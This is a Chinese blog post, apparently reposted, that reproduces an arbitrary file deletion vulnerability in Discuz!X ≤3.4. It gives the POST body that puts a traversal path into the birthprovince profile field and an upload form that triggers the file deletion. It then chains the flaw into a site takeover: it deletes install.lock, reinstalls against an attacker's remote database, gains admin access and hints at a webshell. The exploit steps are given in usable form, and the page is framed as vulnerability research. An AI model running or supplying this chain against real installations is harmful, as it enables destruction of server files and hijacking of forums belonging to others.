Discuz!X ≤3.4 任意文件删除漏洞复现+GetWebshell

今天看到一位师傅发了一篇分析的文章:

【漏洞分析】Discuz!X ≤3.4 任意文件删除漏洞分析

复现的话需要源码在网上还是找到了

那我们根据文章所知的几个步骤:

1.修改出生地为文件相对路径

发送POST请求:/home.php?mod=spacecp&ac=profile&op=base

POST正文为:birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b

formhash为用户自己的,所以这里在网页上找一个对应填写过来就OK:

请求完成之后出生地会修改为../../../test.txt

2.上传文件

这里构造了一个上传表单:

<form action="http://192.168.0.10/dz3.4/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">

<input type="file" name="birthprovince" id="file"/>Formhash: <input type="text" name="formhash"/>

<input type="hidden" name="profilesubmit" value="1"/>

<input type="submit" value="Submit"/>

</from>

发送过去后发现成功删除了:

漏洞复现成功,那在这里呢我们思考一下能否进行扩大化危害的测试?于是想到了删除安装程序锁(/data/install.lock)

复现上文步骤删除它即可:

删除完成之后,就可以重新安装了:

在我们进行设置数据库的时候有人就问了,你又不知道数据库账号密码,能怎么办?我们可以使用“站库分离”的思路来设置,使用远程数据库即可。

进了后台自然什么都OK了啦:

至于怎么getshell,相信大佬们一堆姿势~~

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2017-12-21

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏数据和云

按图索骥:Oracle数据库无响应故障的处理思路和方法

熊军(老熊) 云和恩墨西区总经理 Oracle ACED,ACOUG核心会员 无响应故障现象分析 ---- Oracle数据库无响应故障,简单地讲就是数据库实例...

39180
来自专栏jeremy的技术点滴

使用logrotate进行日志分割及滚动处理

41750
来自专栏Youngxj

kangle安装vhms前台销售教程

87620
来自专栏未闻Code

MongoDB备份有密码的数据库

在MongoDB使用自带的mongodump备份数据的时候,如果数据库设置了密码,那么在指定mongodump的--password 密码参数的同时,还必须指定...

28630
来自专栏.net core新时代

在线文档预览方案-office web apps

  最近在做项目时,要在手机端实现在线文档预览的功能。于是百度了一下实现方案,大致是将文档转换成pdf,然后在通过插件实现预览。这些方案没有具体实现代码,也没有...

1.4K90
来自专栏FreeBuf

LaserCrack:一款可扩展的暴力破解框架

lasercrack是一款爆力破解工具,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率,不过我还没有找到ruby写的,一方面是想从原理...

15220
来自专栏云计算教程系列

如何在CentOS 7上使用MEAN.JS安装MEAN堆栈

术语MEAN最初由Valeri Karpov创造,该术语源自每个组件的第一个字母。Valeri在这篇博客文章中定义了MEAN ,其中他给出了选择在MEAN堆栈的...

7900
来自专栏linux运维学习

linux学习第三十五篇:LAMP架构介绍,MySQL_MariaDB介绍,MySQL安装

uname -a :可以查看你的系统是32位还是64位的操作系统 LAMP架构介绍 LAMP = Linux+Apache(httpd)+MySQL+PHP ...

224100
来自专栏walterlv - 吕毅的博客

Windows 无法删除文件夹 —— 访问被拒绝 / 因为目录不是空的

发布于 2018-08-13 09:21 更新于 2018-09...

1.4K10
来自专栏Java学习网

Web应用程序遭黑客入侵的五大征兆

  大多数针对Web应用程序的攻击都非常隐蔽,不容易发现。从2015威瑞森数据泄漏调查报告来看,攻击者平均可以在网络上潜伏205天不被发现。许多组织都是从其他人...

34350

扫码关注云+社区

领取腾讯云代金券